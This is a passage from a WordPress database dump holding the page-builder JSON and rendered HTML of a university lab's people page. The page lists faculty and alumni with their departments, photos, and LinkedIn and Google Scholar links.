Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c168\",\"index\":1,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c173\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c173\",\"index\":2,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c173\",\"index\":1,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c178\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c178\",\"index\":2,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c182\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c182\",\"index\":2,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c182\",\"index\":1,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c187\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c187\",\"index\":2,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c187\",\"index\":1,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c194\",\"parentId\":\"182-c193\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c193\",\"parentId\":\"182-c192\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c192\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',562,'https://gsudice.dataconn.net/?p=1637',0,'revision','',0),(1638,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c58\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c58 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c59-outer\">\n            <div data-colibri-id=\"182-c59\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c59 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-986 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 